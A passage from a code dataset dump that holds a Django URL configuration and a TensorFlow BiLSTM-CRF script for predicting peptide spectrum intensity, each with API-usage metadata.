"line_number": 153, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 156, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 159, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 163, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 187, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 187, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 208, "usage_type": "call"}, {"api_name": "dataMethods_corsica.load_data", "line_number": 214, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.load", "line_number": 216, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 216, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 225, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 234, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 246, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 250, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 253, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 253, "usage_type": "name"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 254, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 254, "usage_type": "name"}, {"api_name": "sklearn.externals.joblib.load", "line_number": 257, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 257, "usage_type": "name"}, {"api_name": "sklearn.externals.joblib.load", "line_number": 259, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 259, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 265, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.logspace", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 271, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 282, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 290, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 290, "usage_type": "name"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 291, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 291, "usage_type": "name"}, {"api_name": "docopt.docopt", "line_number": 297, "usage_type": "call"}]} +{"seq_id": "83241911", "text": "from django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^', include('basic.urls')),\n url(r'^docker/', include('docker.urls') ),\n url(r'^vm/', include('vm.urls') ),\n url(r'^twitter/', include('twitter.urls') ),\n url(r'^client/', include('client.urls') ),\n\n]\n\n\nif settings.DEBUG:\n\turlpatterns+= ( static(settings.STATIC_URL) )\n", "sub_path": "hadoop/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 499, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.settings.DEBUG", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 19, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.settings.STATIC_URL", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "159701427", "text": "import tensorflow as tf\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn import preprocessing\r\nimport random\r\n\r\n\r\n\r\nimport sys \r\nimport os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\ndirs = os.path.join( os.path.dirname(__file__),'..')\r\nos.sys.path.append(os.path.join( os.path.dirname(__file__), '..'))\r\nfrom tools.get_data import GetData\r\nfrom tools.pearson import CalcPerson\r\n\r\nimport argparse\r\n\r\n\r\ndef parse_args():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--is-train', type=int, default=0,help='1=train, 2=test, 0=train and test')\r\n parser.add_argument('--num-iter', type=int, default=100,help='the number of training steps to take')\r\n parser.add_argument('--batch-size', type=int, default=512,help='the number of peptide')\r\n parser.add_argument('--keep-prob', type=float, default=0.5,help='')\r\n parser.add_argument('--learning-rate', type=float, default=1e-3,help='')\r\n parser.add_argument('--input-size', type=int, default=185,help='')\r\n parser.add_argument('--num-classes', type=int, default=10,help='')\r\n parser.add_argument('--output-size', type=int, default=1,help='predict ionic strength')\r\n parser.add_argument('--layer-num', type=int, default=2,help='')\r\n parser.add_argument('--cell-size', type=int, default=650,help='')\r\n parser.add_argument('--intensity_num_label', type=int, default=1, help=\"\") \r\n return parser.parse_args()\r\n\r\nclass LSTM(object):\r\n def __init__(self, args):\r\n self.max_time = tf.placeholder(shape=None,dtype=tf.int32,name='max_time')\r\n self.input_size = args.input_size\r\n self.output_size = args.output_size\r\n self.cell_size = args.cell_size\r\n self.batch_size=tf.placeholder(shape=None,dtype=tf.int32,name='batch_size')\r\n self.layer_num=args.layer_num\r\n self.learning_rate=args.learning_rate\r\n self.num_classes=args.num_classes\r\n self.keep_prob=tf.placeholder(shape=None,dtype=tf.float32,name='keep_prob')\r\n self.seq_length = tf.placeholder(tf.float32,[None],name='seq_length')\r\n #self.batch_size = batch_size\r\n \r\n with tf.name_scope('inputs'):\r\n self.X = tf.placeholder(tf.float32, [None, None, self.input_size], name='X')\r\n self.y = tf.placeholder(tf.int32, [None, None], name='y')\r\n with tf.variable_scope('in_hidden'):\r\n self.add_input_layer()\r\n with tf.variable_scope('LSTM_cell'):\r\n self.add_cell()\r\n with tf.variable_scope('out_hidden'):\r\n self.add_output_layer()\r\n with tf.variable_scope('loss'):\r\n self.add_crf_layer()\r\n with tf.name_scope('train'):\r\n self._params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)\r\n #regularization= 0.001* tf.reduce_sum([ tf.nn.l2_loss(v) for v in self._params ])\r\n self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss,var_list=self._params)\r\n def add_input_layer(self,):\r\n l_in_x = tf.reshape(self.X, [-1, self.input_size], name='2_2D') # (batch*n_step, in_size)\r\n Ws_in = self._weight_variable([self.input_size, self.cell_size])\r\n \r\n bs_in = self._bias_variable([self.cell_size,])\r\n with tf.name_scope('Wx_plus_b'):\r\n l_in_y =tf.matmul(l_in_x, Ws_in) + bs_in\r\n self.l_in_y = tf.reshape(l_in_y, [-1, self.max_time, self.cell_size], name='2_3D')\r\n\r\n def add_cell(self):\r\n lstm_fw_cell =tf.nn.rnn_cell.LSTMCell(self.cell_size)\r\n lstm_bw_cell = tf.nn.rnn_cell.LSTMCell(self.cell_size)\r\n\r\n lstm_fw_cell = tf.contrib.rnn.DropoutWrapper(cell=lstm_fw_cell, input_keep_prob=self.keep_prob)\r\n lstm_bw_cell = tf.contrib.rnn.DropoutWrapper(cell=lstm_bw_cell, input_keep_prob=self.keep_prob)\r\n \r\n\r\n mlstm_fw_cell = tf.nn.rnn_cell.MultiRNNCell([lstm_fw_cell] * self.layer_num, state_is_tuple=True)\r\n mlstm_bw_cell = tf.nn.rnn_cell.MultiRNNCell([lstm_bw_cell] * self.layer_num, state_is_tuple=True)\r\n self.seq_length = tf.cast(self.seq_length, tf.int32) \r\n #with tf.name_scope('initial_state'):\r\n # self.cell_init_state = mlstm_cell.zero_state(tf.shape(self.batch_size)[0], dtype=tf.float32)\r\n #lstm_inputs=tf.unstack(self.l_in_y, self.max_time, 1)\r\n (self.output_fw, self.output_bw), self.states = tf.nn.bidirectional_dynamic_rnn(\r\n mlstm_fw_cell,\r\n mlstm_bw_cell,\r\n self.l_in_y,\r\n sequence_length=self.seq_length,\r\n dtype=tf.float32 )\r\n\r\n def add_output_layer(self):\r\n \r\n l_out_x =tf.reshape(tf.concat([self.output_fw, self.output_bw],axis=2), [-1, self.cell_size * 2])\r\n Ws_out = self._weight_variable([self.cell_size*2, self.num_classes])\r\n tf.summary.histogram('Ws_out',Ws_out)\r\n bs_out = self._bias_variable([self.num_classes, ])\r\n tf.summary.histogram('bs_out',bs_out)\r\n with tf.name_scope('Wx_plus_b'):\r\n self.lstm_outputs =tf.matmul(l_out_x, Ws_out) + bs_out\r\n \r\n \r\n\r\n def add_crf_layer(self):\r\n scores = tf.reshape(self.lstm_outputs, [-1, self.max_time, self.num_classes])\r\n\r\n \r\n \r\n if True:\r\n # Linear-CRF.\r\n log_likelihood, self.transition_params = tf.contrib.crf.crf_log_likelihood(scores, tf.reshape(self.y,[-1,self.max_time]),tf.cast(self.seq_length, tf.int32)) #loss=MLP(pred,lable)\r\n\r\n self.loss = tf.reduce_mean(-log_likelihood)\r\n\r\n self.tags, best_score = tf.contrib.crf.crf_decode(scores, self.transition_params, tf.cast(self.seq_length, tf.int32))\r\n\r\n #reshape_label=tf.reshape(tf.cast(self.y,tf.float32),[-1,1])\r\n #reshape_tags=tf.reshape(tf.cast(self.tags,tf.float32),[-1,1])\r\n\r\n\r\n #self.mse_bias=tf.losses.mean_squared_error(reshape_tags,reshape_label)\r\n\r\n #self.loss+=(self.mse_bias*0.1)\r\n\r\n #pred=1/(1+tf.exp(-tf.reshape(tf.cast(self.tags,tf.float32),[-1,1])))\r\n #lable_p=1/(1+tf.exp(-tf.reshape(tf.cast(self.y,tf.float32),[-1,1])))\r\n #cross_entropy = -lable_p * tf.log(pred) -(1-lable_p) * tf.log(1-pred)\r\n #reduce_sum = tf.reduce_sum(cross_entropy, 1)\r\n #rank_loss = tf.reduce_mean(reduce_sum)\r\n #self.loss+=rank_loss\r\n\r\n else:\r\n losses = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=scores,\r\n labels=self.y)\r\n mask = tf.sequence_mask(tf.cast(self.seq_length, tf.int32))\r\n losses = tf.boolean_mask(losses, mask)\r\n self.loss = tf.reduce_mean(losses)\r\n\r\n self.tags = tf.argmax(scores, axis=-1)\r\n self.tags = tf.cast(self.tags, tf.int32)\r\n tf.summary.scalar('loss', self.loss)\r\n tf.add_to_collection('pred_network', self.tags)\r\n \r\n\r\n\r\n #def compute_cost(self,pred,label):\r\n # losses = tf.contrib.nn.seq2seq.sequence_loss_by_example(\r\n # [tf.reshape(pred, [-1], name='reshape_pred')],\r\n # [tf.reshape(label, [-1], name='reshape_target')],\r\n # [tf.ones([self.batch_size * self.max_time], dtype=tf.float32)],\r\n # average_across_timesteps=True,\r\n # softmax_loss_function=self.ms_error,\r\n # name='losses'\r\n # )\r\n # loss = tf.div(\r\n # tf.reduce_sum(losses, name='losses_sum'),\r\n # tf.cast(self.batch_size,tf.float32),\r\n # name='average_loss')\r\n # return loss\r\n #tf.summary.scalar('loss', self.loss)\r\n @staticmethod\r\n def ms_error(labels, logits):\r\n return tf.square(tf.subtract(labels, logits))\r\n\r\n def _weight_variable(self, shape, name='weights'):\r\n #initializer = tf.random_normal_initializer(mean=0., stddev=1.,)\r\n return tf.get_variable(shape=shape, name=name)\r\n\r\n def _bias_variable(self, shape, name='biases'):\r\n #initializer = tf.constant_initializer(0.1)\r\n return tf.get_variable(name=name, shape=shape)\r\n\r\ndef get_batch_peptide(merge_list,_batch_size):\r\n number_of_peptide=len(merge_list[0])\r\n batch_peptide=[]\r\n seq_length=[]\r\n _batch_number=int(number_of_peptide/_batch_size)\r\n for i in range(_batch_number):\r\n batch_peptide.append(merge_list[0][i*_batch_size:(i+1)*_batch_size])\r\n seq_length.append([])\r\n for j in range(len(batch_peptide[i])):\r\n seq_length[len(batch_peptide)-1].append(len(merge_list[0][i*_batch_size+j]))\r\n if _batch_number*_batch_size < number_of_peptide:\r\n seq_length.append([])\r\n batch_peptide.append(merge_list[0][_batch_number*_batch_size:])\r\n for k in range(len(batch_peptide[-1])):\r\n seq_length[len(batch_peptide)-1].append(len(merge_list[0][_batch_number*_batch_size+k]))\r\n _batch_number+=1\r\n return batch_peptide,_batch_number,seq_length\r\n\r\ndef padding_data(data,flag,max_ions_number):\r\n if flag ==1 :\r\n _ydim=data.shape[1]\r\n else:\r\n _ydim=data.shape[0]\r\n #_ydim=data.shape[1]\r\n dv=max_ions_number-data.shape[0]\r\n data=data.tolist()\r\n if dv > 0:\r\n if flag ==1:\r\n data.extend(np.zeros((dv,_ydim)).astype('int32').tolist())\r\n else:\r\n data.extend(np.zeros((dv,)).astype('int32').tolist())\r\n #data.extend(np.zeros((dv,_ydim)).tolist())\r\n return data\r\n\r\ndef model_train(args):\r\n model = LSTM(args)\r\n with tf.Session() as sess:\r\n merged = tf.summary.merge_all()\r\n writer = tf.summary.FileWriter(\"lstm-logs\", sess.graph)\r\n init = tf.global_variables_initializer()\r\n sess.run(init)\r\n #train data\r\n _,_,train_X,train_y,merge_train_list=data.get_discretization_data('data/data_swedcad_mm/am/train_1label.txt',args.num_classes)\r\n print(str(len(merge_train_list[0]))+' train peptides ,DataShape:('+str(np.array(train_X).shape)+str(np.array(train_y).shape)+')')\r\n batch_peptide,_batch_number,seq_length=get_batch_peptide(merge_train_list,args.batch_size)\r\n\r\n #val data\r\n _,_,val_X,val_y,merge_val_list=data.get_discretization_data('data/data_swedcad_mm/am/test_1label.txt',args.num_classes)\r\n print(str(len(merge_val_list[0]))+' val peptides ,DataShape:('+str(np.array(val_X).shape)+str(np.array(val_y).shape)+')')\r\n val_batch_peptide,val_batch_number,val_seq_length=get_batch_peptide(merge_val_list,args.batch_size)\r\n \r\n #if len(seq_length[-1]) < args.batch_size:\r\n # seq_length[-1].extend([0]*(args.batch_size-len(seq_length[-1])))\r\n print('..trainning')\r\n \r\n for Iter in range(args.num_iter):\r\n train_acc=0;train_loss=0\r\n\t\t\t\r\n permutation_batch = np.random.permutation(len(batch_peptide))\r\n suffled_batch_peptide=np.array(batch_peptide)[permutation_batch].tolist()\r\n suffled_seq_length=np.array(seq_length)[permutation_batch].tolist()\r\n\t\t\t\r\n for i,(train_piptide_index) in enumerate(suffled_batch_peptide):\r\n X=[];y=[];\r\n\t\t\t\t\r\n max_ions_number=max(suffled_seq_length[i])\r\n permutation_peptide = np.random.permutation(len(train_piptide_index))\r\n suffled_seq=np.array(suffled_seq_length[i])[permutation_peptide].tolist()\r\n suffled_train_piptide_index=np.array(train_piptide_index)[permutation_peptide].tolist()\r\n\t\t\t\t\r\n #padding_pep_num=args.batch_size-len(train_piptide_index)\r\n for j in range(len(suffled_train_piptide_index)):\r\n train_ion_index=data.get_split_list(suffled_train_piptide_index[j])\r\n X.append(padding_data(train_X[np.array(train_ion_index)],1,max_ions_number))\r\n y.append(padding_data(train_y[np.array(train_ion_index)],0,max_ions_number))\r\n #if padding_pep_num >0:\r\n # for k in range(padding_pep_num):\r\n \r\n # X.append(padding_data(np.zeros((2,args.input_size)),1,max_ions_number))\r\n # y.append(padding_data(np.zeros((2,)),0,max_ions_number))\r\n \r\n feed_dict = {\r\n model.X:np.array(X),\r\n model.y:np.array(y),\r\n model.keep_prob:args.keep_prob,\r\n model.seq_length:suffled_seq,\r\n model.max_time:max_ions_number,\r\n model.batch_size:len(X)\r\n \r\n }\r\n _, loss, state, pred = sess.run(\r\n [model.train_op, model.loss,model.states, model.tags],\r\n feed_dict=feed_dict)\r\n train_loss+=loss \r\n mask = (np.expand_dims(np.arange(max_ions_number), axis=0) < np.expand_dims(suffled_seq, axis=1))\r\n total_labels = np.sum(suffled_seq)\r\n correct_labels = np.sum((np.array(y) == pred) * mask)\r\n accuracy = 100.0 * correct_labels / float(total_labels)\r\n train_acc+=accuracy\r\n val_acc=0;val_loss=0\r\n for i, val_piptide_index in enumerate(val_batch_peptide):\r\n X=[];y=[]\r\n \r\n max_ions_number=max(val_seq_length[i])\r\n for j in range(len(val_piptide_index)):\r\n train_ion_index=data.get_split_list(val_piptide_index[j])\r\n X.append(padding_data(val_X[np.array(train_ion_index)],1,max_ions_number))\r\n y.append(padding_data(val_y[np.array(train_ion_index)],0,max_ions_number))\r\n feed_dict_val = {\r\n model.X:np.array(X),\r\n model.y:np.array(y),\r\n model.keep_prob:args.keep_prob,\r\n model.seq_length:val_seq_length[i],\r\n model.max_time:max_ions_number,\r\n model.batch_size:len(X)\r\n \r\n }\r\n loss_val, pred_val = sess.run([model.loss, model.tags],feed_dict=feed_dict_val)\r\n val_loss+=loss_val\r\n mask = (np.expand_dims(np.arange(max_ions_number), axis=0) < np.expand_dims(val_seq_length[i], axis=1))\r\n total_labels = np.sum(val_seq_length[i])\r\n correct_labels = np.sum((np.array(y) == pred_val) * mask)\r\n accuracy = 100.0 * correct_labels / float(total_labels)\r\n val_acc+=accuracy \r\n #val_acc,val_loss=val(args,model,val_X,val_y,val_batch_peptide,val_seq_length)\r\n print(\"Epoch: %d\" % (Iter+1), \"train loss: %.2f\" % (train_loss/_batch_number),\"train acc: %.2f%%\" % (train_acc/_batch_number))\r\n print(\"Epoch: %d\" % (Iter+1), \"val loss: %.2f\" % (val_loss/val_batch_number),\"val acc: %.2f%%\" % (val_acc/val_batch_number))\r\n result = sess.run(merged, feed_dict)\r\n writer.add_summary(result, Iter)\r\n \r\n #print('Iter[%d/%d],loss[%.4f]' % (Iter+1,args.num_iter,round(loss,4)))\r\n print(\"SaveModel:\",tf.train.Saver().save(sess,'lstm/model/model.ckpt'))\r\n \r\n \r\ndef MSE(label,pred):\r\n return tf.reduce_mean(tf.square(pred-label)) \r\n \r\ndef model_predict(args,kmodel,test_data,merge_test_list,test_label):\r\n print('predicting..')\r\n \r\n print('number of peptide:'+str(len(merge_test_list[0])))\r\n with tf.Session() as session:\r\n batch_peptide,_batch_number,_seq_length=get_batch_peptide(merge_test_list,args.batch_size)\r\n \r\n\r\n saver = tf.train.import_meta_graph('lstm/model/model.ckpt.meta')\r\n saver.restore(session, tf.train.latest_checkpoint('lstm/model/'))\r\n graph=tf.get_default_graph()\r\n inputs_X=graph.get_operation_by_name(\"inputs/X\").outputs[0]\r\n batch_size=graph.get_operation_by_name(\"batch_size\").outputs[0] \r\n keep_prob=graph.get_operation_by_name(\"keep_prob\").outputs[0]\r\n max_time=graph.get_operation_by_name(\"max_time\").outputs[0]\r\n seq_length=graph.get_operation_by_name(\"seq_length\").outputs[0]\r\n\r\n pred_y=tf.get_collection(\"pred_network\")[0]\r\n pred=[];aaa=[]\r\n mse_list=[]\r\n total_labels=0;correct_labels=0\r\n for i,(test_piptide_index) in enumerate(batch_peptide):\r\n X=[];y=[]\r\n _max_ions_number=max(_seq_length[i])\r\n padding_pep_num=args.batch_size-len(test_piptide_index)\r\n for j in range(len(test_piptide_index)):\r\n test_ion_index=get_split_list(test_piptide_index[j])\r\n X.append(padding_data(test_data[np.array(test_ion_index)],1,_max_ions_number))\r\n y.append(padding_data(test_label[np.array(test_ion_index)],0,_max_ions_number))\r\n \r\n\r\n pred_ = session.run(pred_y,feed_dict={\r\n inputs_X: np.array(X),\r\n keep_prob:args.keep_prob,\r\n seq_length:_seq_length[i],\r\n max_time:_max_ions_number,\r\n batch_size:len(X)\r\n })\r\n for k in range(len(X)): \r\n pred.extend(pred_[k][:_seq_length[i][k]])\r\n aaa.extend(y[k][:_seq_length[i][k]])\r\n\r\n mask = (np.expand_dims(np.arange(_max_ions_number), axis=0) < np.expand_dims(_seq_length[i], axis=1))\r\n total_labels += np.sum(_seq_length[i])\r\n correct_labels += np.sum((np.array(y) == pred_) * mask)\r\n \r\n accuracy = 100.0 * correct_labels / float(total_labels)\r\n print(\"test Accuracy: %.2f%%\" % accuracy)\r\n #pred_[pred_>1]=1\r\n #pred_[pred_<0]=0 \r\n #_mse=session.run(MSE(np.reshape(y,(-1,1)),pred_))\r\n #mse_list.append(_mse)\r\n cunt=0;cunt2=0\r\n for i in range(len(aaa)):\r\n if aaa[i]==0:\r\n cunt+=1\r\n if aaa[i]==pred[i]:\r\n cunt2+=1\r\n \r\n print(cunt/len(aaa))\r\n print(cunt2/len(aaa))\r\n predaaa = pd.DataFrame({\"pred\":pred,\"label\":aaa})\r\n predaaa.to_csv('data//SwedCAD_pred2.csv')\r\n min_max_scaler = preprocessing.MinMaxScaler()\r\n pred_minmax = min_max_scaler.fit_transform(pred)\r\n return pred_minmax\r\n\r\ndef get_merge_pred(merge_list,pred,data):\r\n print('get predict spectrum intensity list...')\r\n merge_list.append(data.merge_list_1label(pred))\r\n return merge_list\r\ndef calc_pear(test_idx,peptide,pred,merge_list,pear,data):\r\n \r\n pred_pd=pear.write_pred(test_idx,peptide,pred)\r\n merge_list=get_merge_pred(merge_list,pred_pd,data)\r\n \r\n person_mean=pear.get_pearson(merge_list) \r\n return person_mean\r\n\r\ndef test(args,data,pear):\r\n test_idx,peptide,pred,merge_test_list=model_predict(args,data)\r\n person_mean=calc_pear(test_idx,peptide,pred,merge_test_list,pear,data)\r\n print(person_mean)\r\n\r\ndef main(args,data,pear):\r\n if args.is_train==1:\r\n model_train(args)\r\n elif args.is_train==2:\r\n test(args,data,pear)\r\n else:\r\n model_train(args)\r\n test(args,data,pear)\r\n\r\nif __name__ == '__main__':\r\n args=parse_args()\r\n \r\n data=GetData(args.intensity_num_label)\r\n pear=CalcPerson(args.intensity_num_label)\r\n main(args,data,pear)\r\n ", "sub_path": "lstm/BiLSTM_CRF.py", "file_name": "BiLSTM_CRF.py", "file_ext": "py", "file_size_in_byte": 19636, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 14, "usage_type": "call"}, {"api_name": "os.sys.path.append", "line_number": 15, "usage_type": "call"}, {"api_name": "os.sys", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 15, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 52, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 62, "usage_type": "call"}, {"api_name": "tensorflow.get_collection", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.GraphKeys", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 65, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.nn.rnn_cell.LSTMCell", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.rnn_cell.LSTMCell", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.rnn.DropoutWrapper", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.rnn.DropoutWrapper", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.rnn_cell.MultiRNNCell", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.rnn_cell.MultiRNNCell", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 84, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.bidirectional_dynamic_rnn", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.concat", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 100, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 102, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 103, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 104, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 109, "usage_type": "call"}, {"api_name": "tensorflow.contrib.crf.crf_log_likelihood", "line_number": 115, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 115, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 115, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 115, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 115, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.contrib.crf.crf_decode", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 119, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 119, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 137, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 137, "usage_type": "attribute"}, {"api_name": "tensorflow.sequence_mask", "line_number": 139, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 139, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 139, "usage_type": "attribute"}, {"api_name": "tensorflow.boolean_mask", "line_number": 140, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 143, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 144, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 144, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 145, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 145, "usage_type": "attribute"}, {"api_name": "tensorflow.add_to_collection", "line_number": 146, "usage_type": "call"}, {"api_name": "tensorflow.square", "line_number": 167, "usage_type": "call"}, {"api_name": "tensorflow.subtract", "line_number": 167, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 171, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 207, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 213, "usage_type": "call"}, {"api_name": "tensorflow.summary.merge_all", "line_number": 